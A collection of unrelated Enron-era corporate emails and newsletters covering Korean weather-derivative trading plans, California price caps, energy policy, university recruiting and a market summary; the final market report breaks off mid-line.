internally, he'd have worked that hard whatever." "It's remarkable the way he's come back," said sophomore cornerback Roderick Babers, noting that Applewhite has been occasionally overthrowing even the speediest receivers in workouts. "In two-a-days, it'll be a fair fight." Asked to size up how Applewhite and Simms have looked in informal workouts, Babers said, "I think (Simms) has the advantage. Major's been sitting out and Simms' confidence is up, big-time. That's what you need in a quarterback. But at the same time, Major's a veteran. He's beaten Nebraska. He's beaten them all." "He's the same old Major," cornerback Quentin Jammer said. Soon Applewhite will probably be as tired of talking about the quarterback duel as he is about answering questions about the state of his knee. Now, a month before the freshmen report on Aug. 13, he's talking about how he's not competing against Simms, just against himself. "The competitive nature that Tiger Woods has is the competitive nature I have," Applewhite said. "At Pebble Beach, Tiger was up 15 and had a 10-footer on the last hole for birdie, and he was out there lining it up. He could have done the 'Happy Gilmore' tap to the hole and still won. But he wanted it all." Simms has bulked up from 208 to 223 pounds, working on his leg and upper body strength. "I feel like there's more to me now, that it's not like the wind's going to blow me over," he said. "I don't want to be a wimpy quarterback. I want to be like Brett Favre. He's not the biggest or the fastest, but he can run when he has to and he can chuck it 80 (yards). "It's going to come, and it'll get worse," Simms said of the building scrutiny. "To tell you the truth, I don't care. Football's a competitive sport. There's nothing you can do about it." So he shrugs it off for now, concentrating on finishing up summer school. He's working on his topic for a writing course, "History of American Baseball." The book he chose is about Babe Ruth. In August, the topic switches to college football. The question remains the same. And Chris Simms, or Major Applewhite, won't write this story. They'll live it. ------------------------------------------------------------------------------ --
BUSINESS HIGHLIGHTS Enron Industrial Markets The Transaction Development group (TD) is responsible for corporate development, transaction execution and portfolio management activities within EIM. TD is responsible for asset and corporate acquisitions to support EIM's efforts in the Forest Products and Steel industries. TD works with EIM's Forest Products and Steel Origination groups to structure and execute complex transactions for EIM's customers. TD also manages EIM's equity investments, such as EIM's ownership position in Papier Masson, Ltee, a paper mill in Quebec, Canada. TD is comprised of approximately 20 professionals with a wide range of backgrounds including investment banking, commercial banking, management consulting, law, project development, accounting and engineering. In addition, the majority of the analysts and associates within EIM work in TD since it provides a strong base of deal experience for junior members of our organization. Enron Freight Markets Enron Freight Markets has continued to expand the transportation services offered to its customers and completed several flatbed truck moves outbound from Georgia this week. There was a shortage of flatbed equipment supply in this market and EFM was able to obtain more than three times the normal margin on each move. IN THE NEWS "Enron's bilateral internet trading platform, EnronOnline, was launched in November 1999 and is the largest e-commerce site on the planet based on the value of its transactions. As EPRM went to press, it had average daily trading volume of $3.5 billion, accounting for nearly 50% of the company's revenues from wholesale marketing activities." -- Energy Power Risk Management, May 2001 WELCOME New Hires EIM - Cheryl Lindeman ENA - Chris Bystriansky, Paula Craft, Eugene Lee, Bhalachandra Mehendale, Sarah Wooddy Transfers (to or within) ENA - Grace Taylor, Steven Irvin, Dina Snow NUGGETS & NOTES Enron is hosting the Chicago Energy Risk Management Seminar at The Drake Hotel in Chicago on June 14, 2001. Topics include: Power Outlook, Natural Gas Outlook, Hedging Strategies, Weather Risk Management and Pulp and Paper Risk Management. The RSVP deadline is June 8th so please contact Laura Pena as soon as possible at x 3-5376. This is a great event for "new" as well as established customers. There will be a cocktail reception immediately after the presentations. Enron will also be hosting seminars in Atlanta, Houston, Denver and San Francisco. Dates to be announced soon. Travel tip of the week: Flights reserved through Travel Agency in the Park provide you with $150,000 of flight insurance at no additional charge. EnronOnline Statistics Below are the latest figures for EnronOnline as of May 29, 2001. * Total Life to Date Transactions > 1,015,000 * Life to Date Notional Value of Transactions > $610 billion NEWS FROM THE GLOBAL FLASH Enron arranges first gas pipeline import into Italy Enron has continued its pioneering activities in the Continental gas market by arranging the first gas import into Italy. The Italian team worked with the Continental Gas desk to arrange this strategically important agreement with Blugas SpA., the wholesale gas company formed by the municipalities of Cremona, Lodi, Mantova and Pavia in north-eastern Italy. Enron has sourced 100,000 cubic metres per day of natural gas from northern Europe to transport to Italy, transiting it through Germany and Switzerland, despite fierce resistance from Ruhrgas and TransitGas respectively. Aside from isolated LNG imports by incumbent monopolies this is the first time that any company has managed to import natural gas by pipeline into Italy since the Italian gas sector was officially liberalised in August 2000. The gas, which started flowing at 06.00 on Thursday 17th May 2001, will be used to meet the needs of two thirds of Blugas' residential customers within the four municipalities. The current contract lasts for five months. Congratulations to Fabio Greco, Carsten Haack, Didier Magne, Michael Schuh, Marco Lantieri and Daniela Uguccioni. Enron in the Middle East Enron has relinquished its stake in Dolphin Energy, the joint venture company formed to develop gas reserves in Qatar. Enron has agreed to transfer its 24.5 per cent stake in the project to the United Arab Emirates Offset Group (UOG), the majority shareholder. The agreement allows Enron to deploy capital elsewhere and gives UOG the opportunity to seek new partners before the project moves into its next phase. Development of the Emden/Oude gas hub moves ahead fast An important milestone in the evolution of the new gas trading hub on the Dutch-German border was reached last week. Last Friday some of the major European gas players held a meeting to officially establish the Emden/Oude gas hub. Although Enron had already initiated the development of the Emden/Oude hub by making a market through EnronOnline as early as December 2000, the goal of this meeting was to set up a working group similar to the Zeebrugge focus group who can work on setting a legal framework for the Emden/Oude hub. Enron was elected as the only new market entrant in this group, reflecting the high level of respect industry peers have for Enron as a major player in the Continental gas market -- even from incumbents! LEGAL STUFF The information contained in this newsletter is confidential and proprietary to Enron Corp. and its subsidiaries. It is intended for internal use only and should not be disclosed. <Embedded Picture (Metafile)>
To Jae- Moo, 1. Impressive P'point presentation indeed. 2. Friday Sep 1 - 800am TYO time is good for Australia, I will be attending is there anything that i need to arrange at our end ?? 3. After the successful roll-out of W for Japan & Oz thus qtr, as discussed - we are ready to roll-out Korean W say in Mid October ??? Your email & presenatation thus arrived at a very good time. 4. Just some questions - You may answer in the conference call or by email -- your choice (a) why has W derivatives been singled out by FSC for potential review when there is no regulation of eg LPG , or plastics swaps & fwds ? (pg 11 of presentation) (b) How necessary are the meetings with ( pg 5 of presentation) ".. Bank of Korea (BOK)/ Ministry of Finance & Economy (MOFE) for classification of weather derivatives as commodity derivatives.." ? Is this meeting to meet "...except for Foreign Exchange Transaction Regulations (FETR) in case of foreign currency trades ? Classification of weather derivatives as commodity or financial derivatives under FETR needs to be resolved..."(pg 15 of presentation) Can we just do it first with Enron Korea as the counterparty ? If so , if Korean coy transacts with Enron Korea, there should be no problem in remitting funds wholly within Korea ! Also we intend to offer product in Won only so no FX involved at all . (c) pg 18 of presentation '...All other EnronOnline products with the exception of bandwidth and emission allowances are classified as commodity derivatives in Korea..." Why is it bandwidth and emission are classified differently? Will not Weather fall under same category ? "...Commodity derivatives require a prior reporting to the Bank of Korea for each trade .." Is this only relevant if product is not in Won but foreign currency ? 5. pg 28 of presentation Note that Dr Christian Werner - Sydney office will be the person for "Data system  For weather derivative products, arrange with a weather forecasting company for the weather data feed - timing depends on the location" We will be able to assist with (if reqd, see points 4b & c above) "... For weather derivatives, arrange presentation meetings with BOK/MOFE for classification of weather derivatives as commodity derivatives _ May require longer time for their decision making Korea Office, Mike Dahlke, EOL Weather specialist (?)" Best wishes Raymond Matthias Lee@ECT 08/24/2000 09:22 PM To: Jae-Moo Lee/Corp/Enron@ENRON cc: Christopher B Hunt/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Joseph P Hirl/AP/ENRON@ENRON, David Forster/Corp/Enron@Enron, John Ambler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Mike Dahlke/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Bruce Lundstrom/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Alan Aronowitz/HOU/ECT@ECT, Mike Brown/ENRON@Gateway@ENRON, Justin Timothy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Paul Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Raymond Yeow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, John Viverito/Corp/Enron@Enron, Rousseau Anai/AP/Enron@Enron, John Chismar/SIN/ECT@ECT, Victor Santos/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Li Yin Lim/SIN/ECT@ECT, Mark Taylor/HOU/ECT@ECT, David Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Jonathan Whitehead/AP/Enron@Enron, Michelle Lee/Corp/Enron@Enron, Ann Brown/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Matthias Lee/SIN/ECT@ECT, Angeline Poon/SIN/ECT@ECT Subject: Re: EOL Korea Jae-Moo On the section of Regulatory/Legal Environment, it may be useful to note: 1. There is no official rule or regulation that ex post facto reporting for Commodity Derivatives are acceptable to the Bank of Korea, although your and Korean external lawyer's (Kim & Chang) informal verbal enquiries with the Bank of Korea have suggested they have accepted some 7 or 8 reports since April last year (all from Hyundai Oil). 2. The Bank of Korea take up to two weeks to review the reports and, as Kim & Chang has advised, there remains a possibility that the Bank of Korea may reject the report, although they were not able to advise the grounds on which a report may be rejected. 3. Although, a foreign counterparty need not file a report or seek approval, the Korean counterparty must still do so for the benefit and interest of the foreign counterparty. Kim & Chang advised that where reporting or approval is required but is not made or obtained, the Korean counterparty would not be able to remit its payments under the transaction. This would clearly impact on the settlement of the transaction, in particular shorter term deals since reporting and approval may take several weeks. 4. The Supreme Court of Korea has ruled that a foreign exchange authorization that was originally required should be obtained in order for a foreign party to execute any judgment against the Korean party and remit the proceeds. Regards Matt Jae-Moo Lee@ENRON 08/24/2000 04:58 PM To: Christopher B Hunt/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Joseph P Hirl/AP/ENRON@ENRON, David Forster/Corp/Enron@Enron, John Ambler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mike Dahlke/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bruce Lundstrom/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Alan Aronowitz/HOU/ECT@ECT, Mike Brown/ENRON@Gateway, Justin Timothy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Paul Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Raymond Yeow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Viverito/Corp/Enron@Enron, Rousseau Anai/AP/Enron@Enron, John Chismar/SIN/ECT@ECT, Victor Santos/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Li Yin Lim/SIN/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Matthias Lee/SIN/ECT@ECT, David Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jonathan Whitehead/AP/Enron@Enron cc: Michelle Lee/Corp/Enron@Enron, Ann Brown/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT Subject: EOL Korea As many of you are aware, over the past few months we have been investigating whether or not it would make sense to seriously consider an EOL launch in Korea from a market, regulatory and legal perspective. The primary interest has been on reviewing whether or not we could launch existing products in Korea (e.g., products already handled by Singapore EOL) as well as new products (e.g., Seoul weather). This initial work was directed primarily by the Korea team working within the APACHI group. If a launch is to progress much further from this point, however, substantial attention by the EOL team would be required. To facilitate this, the attached presentation summarizes our primary findings to date and some of our thoughts. We would appreciate your taking a look at the attached document. We would like to arrange a conference call for next Thursday (Aug. 31st) at 6:00 pm by Houston time (Friday at 8:00 am by Tokyo time) to discuss the attached document and to solicit thoughts as to next steps. Please let me know whether you will be able to join this call or, if you have a conflict, an alternative time. Your participation will be greatly appreciated. Best regards, Jae-Moo
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Restructuring Today readers got this story today... Retail market can be opened nationally? --- Joe Barton thinks it can and is about to try --- Once in 20 years opportunity seen How can the retail power market be opened in today's atmosphere? Joe Barton has a way and it sounds like it just might work. He briefed APPA members winding up the last day of the annual meeting in Washington. Barton implored the membership that if they have any ideas on how to improve energy policy, this is the time to tell policy makers or him. Barton sees a narrow, six-week opportunity as America is about to revise its energy policy. We walked with him to his car after the speech and asked what he means by a major energy restructuring bill. He referred vaguely to legislation that would improve the grid and foster the functioning of a robust market providing for movement of power from one place to another. He wants a national market with a grid that can handle it "in an open access way -- creating all these trading markets where you have long-term and short-term markets where you balance supply and demand around the country. "States that have surplus power, through the RTO system can wheel that power to states that need it." That's the wholesale market, we asked. Yes. But what about retail? He hopes to get into the law a provision to foster aggregation of buyers. How would that work? "AARP," Barton said noticing our age, "could sell you power or Wal- Mart or McDonalds or the co-ops. You could buy your power through them." How would a law provide for aggregation? "It would be in the federal legislation that it would be permitted," he replied. But what about Nebraska where there are only munis? "You've got to work through that and see if you get some kind of grandfather or state opt-out provision. It's possible that you give states the right to opt out. But over time those states will want to opt in," he added. "That'll be a debate we'll have when we get into the bill. You're not supposed to ask that tough a question this early in the process," he reminded with a smile. Barton is really impressed with the magnitude of the legislation gestating in the nation's capital. "Everything" is up for discussion, he said, "everything. "There is nothing -- nothing -- that's been debated or talked about in terms of electricity that is not on the table," Barton assured. "I'm not saying we're going to do it all but you have a window like this once every 20 to 30 years. I'm going to be damned if I'm going to stand around and on my on volition take things off the table. "Now the process will automatically take a lot more controversial items out of play. There'll be a region or a political block -- who knows the president might not like something. John Dingell might not like something. Who knows? But I'm not -- even before we put pen to paper to start drafting the bill -- say `we're not going to consider this'," Barton added. Is he getting signals from Dingell that he might be cooperative? "Yeah. Very cooperative. Of course, again, the proof is in the pudding and in the details." Barton's in the leadership role in fostering a national energy policy, taking the package from the vice president and guiding it through the House. He's the president's energy guy from an energy state and Bush has shown -- with the tax bill -- that he can get a program enacted. Barton wants something he can look back at in five, 10 and 20 years and say "that's a good bill. It works." Barton wants to make history with the Energy Policy Act of 2001. Barton told APPA he wants this big bill to be "national, long-term in its impact and balanced." Balanced means looking at the generation component, transmission and distribution "and in each of those areas -- this is just me. I'm not speaking for anyone but myself" -- he wants "to create an environment so we have a maximum, competitive situation that's open and fair to everybody. "And we're going to do that and you're going to have a lot of competition, a lot of flexibility with a lot of choice for consumers and a lot of choice for yourself," Barton added. Wait a minute. He's saying competition in transmission and distribution. We really do need to ask him what he has in mind there when the time is right. We can't help but think of competition in selling pipeline capacity in a secondary market. You can do that with electricity capacity to or on a local distribution system in gas. We're thinking aloud here. That's not what Barton said. He wants to minimize the federal role except where you actually have to. That puts Barton "a little at variance with some in the Bush Administration and some in the Congress because in the modern age there's a natural proclivity to centralize and consolidate which in the political arena means let Washington do it." Barton wants to maximize the technology component and will put into the bill a distributed generation component. He's interested in negawatts, fostering cut backs in demand on a national scale. "Looking out for your own interest," Barton considers to be "democracy." But from time to time you have to step back and look at the national interest, he advocated. "That's my job." Today's crisis mentality helps Congress act boldly. The friendliness to competitive markets in the White House encouraged by the president's pride about the retail bill he got through the Texas Legislature plus today's environment may be ideal for market- minded leaders. You can benefit from Restructuring Today's special, unique focus on the converging energy and communications industries, especially the opening of competitive markets, too. To subscribe simply fax the attached order form to 202-298-8210. Don't miss another vital issue. Subscribe today! Thank you, Season Hawksley US Publishing 800-486-8201 202-298-8201 PS -- Please do not hit 'reply'. To subscribe, cancel, change your email address or ask questions please contact [email protected]. - orderform.pdf
Mary Hain has resigned her position with Enron. Please remove her from all your mail lists. Thank you. Lysa Akin Gov't Affairs - Sr. Admin. Ass't. Enron Capital & Trade Resources Corp. From: NELSON Jeff <[email protected]> 03/21/2001 04:20 PM To: "'Westenberg, Sarah A - LP-7'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]> cc: "'[email protected]'" <[email protected]>, "'Lovell, Byrne - KP-7'" <[email protected]> Subject: RE: WP-02 Data Responses SL-SP:001 through SL-SP:006 Attached are SUB's Data Responses to Bonneville Power Administration's Data Request. These files are sent electronically via e-mail due to potential problems with the Discovery site. > <<Data Response BPA_SP_009.doc>> <<Data_Response_BPA_SP_009.xls>> > <<IOU04.xls>> > Jeff Nelson Resource Projects Manager Springfield Utility Board Phone: (541) 744 - 3779 Fax: (541) 744 - 2263 e-mail: [email protected] - Data Response BPA_SP_009.doc - Data_Response_BPA_SP_009.xls - IOU04.xls
Certainly understand the tradition you have with OU/Texas and it would be hard. I imagine David is starting to feel a little cocky, given we should be undefeated going into Texas, but he may still need to seek the shelter of the study, as I know Texas is not going to roll over and play dead. Sounds like Meagan has a full agenda this Fall and a trip to Norman would only get in the way. I'm sure David will not let the fire die, if she is truly interested in OU. FYI, OU's Spring Break is March 17-25 next year. So you can plan accordingly. Let me know if you decide when you decide to come up and I can get you lined up with Prospective Student Services for a tour. Also, I remember you telling me about your concerns about grades. I know that OU requires a 24 on the ACT, or finish in the top 1/3 of your graduating class. It is my understanding that will soon be increasing to 26 or top 30% of graduating class. Looks like OU is following UT on tightening entrance requirements. I can get you shirts caps, sweatshirts, etc. for OU, UT and Tech. You can go to Bigtimesports.com and look at the styles. I think they are also in the school colors. If you see a style you like, let me know the size shape and school and I can order it. If some of it is for you, let me know, as they have different styles for women. Also, I can have logo's etc. reduced (like I did on your Bevo on your shirt) so they are not so big. I always have them reduce the OU from 1 3/4" to a 1 1/4" size, so I don't look like a "poster boy" for OU. Anyway, let me know and I will order them for you. Let me know when you hear back from Lexi about your discussion relative to summer internship recruiting. Ted K. Jacobs Director of Energy Management The University of Oklahoma 307 West Brooks, Room 218 Norman, OK 73019-4007 (405)325-0758 Fax (405)325-2096 E-mail: [email protected] Website: www.ou.edu/business/em -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Monday, September 25, 2000 1:23 PM To: Jacobs, Ted K Subject: RE: Oklahoma Trip Thanks for looking into the OU/Texas tickets for us. With the ages of the kids, I think that we will pass on those single tickets. The kids love our home tradition for the game, and weren't sure that they wanted to give that up. (I have cake pans in the shape of the state of Texas and the state of Oklahoma - one daugther decorates one, and the other decorates the second cake - add some bean dip and chips and it's our own version of a tailgate party!) We were hoping to bring Meagan up to look at OU this fall, with our eye on that last game of the season. However, Klein High School has started the football season very strongly, winning all games to date. That means that we may be headed for high school playoffs again this year. Meagan is on the drill team and must be at all games. Last year, we played right up to Thanksgiving in the playoffs. So, we have decided to pick a weekend in the spring after drill team contest season is over to make that trip with Meagan. We are interested in caps, shirts, etc. for UT, OU and Texas Tech. Do you have a list of what is available for those schools? "Jacobs, Ted K" <[email protected]> on 09/23/2000 03:07:11 PM To: "'[email protected]'" <[email protected]> cc: Subject: RE: Oklahoma Trip Thanks for the nice words. I hope Enron will be able to look at some students for summer internships, as I am sure they will be gone by Spring. As far as Texas tickets go, I can come up with 5 singles, but not 5 together or even 3 and 2. Let me know if interested and I will try to get them. Might be able to trade up or something. Let me know what other schools you are talking about and I can find out for you. Again, thank you for taking time out your schedule to come up and be a part of the OU recruiting effort. It has been your support and efforts that we have to thank for Enron coming to OU. Keep me posted on what you work out with HR with regards to summer interns. "Hook Em" Ted K. Jacobs Director of Energy Management The University of Oklahoma 307 West Brooks, Room 218 Norman, OK 73019-4007 (405)325-0758 Fax (405)325-2096 E-mail: [email protected] Website: www.ou.edu/business/em -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Friday, September 22, 2000 5:30 PM To: Jacobs, Ted K Subject: Oklahoma Trip It was good to see you in Norman earlier this week. As always, I appreciated your attendance at the presentation and at Coach's afterwards. I am sure that it is rewarding for you to see former students such as Jody and Nate participating on the other side of the recruiting table. You have done a great job in changing and promoting the program. I am pushing Lexi to resolve the question around interview dates for summer interns ASAP. I have also left Mike McConnell a message to make him aware of the issue. I should be able to get back with you next week, hopefully with a change in our strategy! If you do become aware of five OU /Texas tickets, please let me know. We will certainly purchase them, I just made the assumption that all tickets may already be sold. On another note, David has worn his OU shirt to work and has gotten lots of compliments. He has a number of people that have asked him about school shirts, caps, etc. Do you have a list of the schools that you can get merchandise for and the types of merchandise that you can get? Let me know -- we can probably place a few orders through you!
As requested. ---------------------- Forwarded by John J Lavorato/Corp/Enron on 10/30/2000 12:23 PM --------------------------- From: Tim Belden @ ECT 10/27/2000 05:40 PM To: John J Lavorato/Corp/Enron, Dave Delainey, Mike Swerzbin/HOU/ECT@ECT, Robert Badeer/HOU/ECT@ECT, Sean Crandall/PDX/ECT@ECT, Tim Belden/HOU/ECT@ECT, Jeff Richter/HOU/ECT@ECT, Diana Scholtes/HOU/ECT@ECT, Tom Alonso/PDX/ECT@ECT, Mark Fischer/PDX/ECT@ECT, John M Forney/HOU/ECT@ECT, Paul Choi/SF/ECT@ECT, John Malowney/HOU/ECT@ECT, Holli Krebs/HOU/ECT@ECT, Greg Wolfe/HOU/ECT@ECT, Chris H Foster/HOU/ECT@ECT, Stewart Rosman/HOU/ECT@ECT, Kim Ward/HOU/ECT@ECT, Debra Davidson/PDX/ECT@ECT, Tim Belden/HOU/ECT@ECT, Lester Rawson/PDX/ECT@ECT, John Zufferli/CAL/ECT@ECT, James D Steffes/NA/Enron@Enron, Mary Hain/HOU/ECT@ECT, Christopher F Calger/PDX/ECT@ECT, Dave Parquet, Phillip K Allen/HOU/ECT@ECT, Vladimir Gorny/HOU/ECT@ECT, Monica Lande/PDX/ECT@ECT, Elliot Mainzer/PDX/ECT@ECT, Tim Heizenrader/PDX/ECT@ECT, Cooper Richey, Stephen Swain/PDX/ECT@ECT, Susan J Mara/SFO/EES@EES, Steven J Kean/NA/Enron@Enron, Mark Palmer/Corp/Enron@ENRON cc: Debra Davidson/PDX/ECT@ECT Subject: Price Caps The following summarizes recent price cap events in California. I think that I have most of it right. If there is anything wrong or missing please let me know. Please don't share the attached spreadsheet with anyone outside of Enron. Regards, Tim New Cap Specifics On 10/26/2000 the ISO Board passed a motion by a vote of 13-10 to implement a new price cap methodology. The new methodology will become effective 11/3/2000 or as soon thereafter as can be implemented. CAISO staff has indicated that it will be difficult to achieve that start date. They have not yet indicated what an achievable date might be. The new price cap methodology will remain in place until: Comprehensive market changes have been implemented and the market has proven to be workably competitive under a variety of load conditions. Either FERC or the ISO board orders its removal. Cap prices will be based on the average NYMEX L3D settlement average and the following heat rate table: Load Level Heat Rate 4.00 Gas Example Cap <25 GW 10,775 $43.10 25 GW to 30 GW 14,175 $56.70 30GW to 35 GW 17,225 $68.90 35GW to 40 GW 27,225 $108.90 >40 GW $250/MWh $250/MWh Caps will be rounded up to the nearest $5/MWh increment. Demand bids and demand responsiveness programs are exempt from these caps. The ISO will post the price caps for each load level at least 48 hours prior to the beginning of each calendar month. Based on the ISO's two day-ahead system load forecast, the ISO will post hourly caps at least 24 hours prior to the hour of delivery. FERC Context FERC has delegated cap authority to the CAISO until 11/15/2000. The ISO has asserted that they don't need FERC authority since it is a bid cap rather than a sales cap. FERC regulates sales, not purchases, of electricity and therefore can regulate sales prices but not purchase prices. The ISO has filed with FERC for an extension of the price cap authority. FERC has to rule on the filing by 11/18/2000. (Note that this is 3 days after their authority expires) FERC will release its proposed order on 11/1/2000 based on the results of its 206 investigation of the California wholesale power markets. We don't know what they will find or what they will propose. The proposed order will have a 30 day comment period, after which FERC will likely issue a final order. FERC will be accepting oral comments on 11/9/2000 in Washington. Enron still has to determine who will provide oral comments. Many companies have filed at FERC advocating or opposing a litany of price caps, cost based rates, and market redesign recommendations. It is likely that the price caps approved by the ISO board will go into effect. How long they will remain in effect will depend on whether FERC extends the ISO price cap authority and whether the final order stemming from the current 206 investigation stipulates a specific price cap policy. Impact of Price Caps The attached spreadsheet contains a table of likely maximum monthly prices at different gas price levels. We think that this is the highest that markets would clear since it assumes that each hour clears at the cap. It is hard to say whether actual prices would clear significantly lower than the cap because we don't know whether sellers will offer below the cap or at the cap. The assumptions behind our analysis are detailed in the bullets below. Take actual historical loads from 1999 and 2000. Calculate implied price cap for each hour using actual historical load, new price cap methodology, and a range of gas prices. Divide historical hours into peak and off-peak buckets. Calculate average price for each month for peak hours and off-peak hours. For example, we have two years worth of data for the months of January through September. Each month has approximately 400 hours. for January through September, we took approximately 800 observations for each month (400 from each year) and calculated a simple average of all of the individual observations. We created a peak table and an off-peak table. The table shows the calculated implied cap based off of the acutal loads at varying gas prices for each month. This value represents what the month would clear at if each hour cleared at the cap (based on historic loads). While any given hour could be above this value, our calculation estimates the likely monthly average cap value! The blue shading indicates what the caps would be given current (10/27/2000 NYMEX) forward prices. The yellow shading indicates those forward power prices which are in excess of the proposed cap.
Charles Schwab & Co., Inc. Midday Market View(TM) for Tuesday, July 31, 2001 as of 1:00PM EDT Information provided by Standard & Poor's ================================================================ U.S. INDICES (1:00 p.m. EDT) ---------------------------------- Market Value Change DJIA 10,546.40 + 144.70 Nasdaq Comp. 2,050.20 + 32.36 S&P 500 1,219.36 + 14.84 ---------------------------------- NYSE Advancing Issues 1,977 NYSE Declining Issues 1,032 NYSE Trading Volume 584 mln NASDAQ Advancing Issues 1,992 NASDAQ Declining Issues 1,473 NASDAQ Trading Volume 854 mln ================================== U.S. TREASURIES ---------------------------------- Value Yield Change 1-year bill 3.40% n/a 5-year note 4.50% + 6/32 10-year note 5.03% + 6/32 30-year bond 5.50% + 3/32 The tables above look best when viewed in a fixed-width font, such as "Courier." ================================================================ U.S. TRADING SUMMARY Equities didn't flinch at the weak U.S. economic data released this morning as the major averages hovered around opening levels and took the news in stride. The headline indexes quickly moved higher and extended their gains ahead of the noon hour before some consolidation set in. The broad-based rally saw the Dow initially taking the lead, then handing the ball off to the tech-heavy NASDAQ, which shot higher by about 1.8% at midday. On the technical front, resistance for the NASDAQ lies at its 50-day moving average of 2,097. Outperforming industries in the S&P 500 included the drug, financial, health care, semiconductor and computer software/system industries. The oil, electric and railroad sectors were under-performing. ---------------------------------------------------------------- U.S. TREASURY SUMMARY Treasuries were higher by midday as a slew of weak data helped bolster investor confidence that the slowing economy would spur the Fed to again lower interest rates. Indeed, the whole yield curve was in the green by midday with the short end outperforming its longer-term counterparts, even though stocks were enjoying a strong rally of their own. Data on both consumer confidence and a regional measure of manufacturing activity showed much larger-than-expected declines, which bode poorly for the economy and suggested that activity in manufacturing may not have hit bottom yet. The data suggested to some that the Fed may have to be more aggressive than previously thought. Others, however, felt that the data was weak, but would just add to the Fed's resolve to continue on its expected path of cutting interest rates by 25 basis points at its next meeting in August. ---------------------------------------------------------------- CURRENCY SUMMARY Talk is circulating that the Brazilian Central Bank has been behind the dollar's rally back to 125 yen from 124.6 yen. The bank floated a 200 billion yen ($1.6 billion) bond issue today and the speculation is that the bank has sold the yen proceeds to buy dollars. Elsewhere, euro bulls have been frustrated by the lack of follow-through buying on the weak U.S. data offering. The euro briefly touched 0.878 dollars per euro, but has since sunk below the 0.875 level. ---------------------------------------------------------------- MAJOR COMPANY / INDUSTRY NEWS (All prices as of 1:05 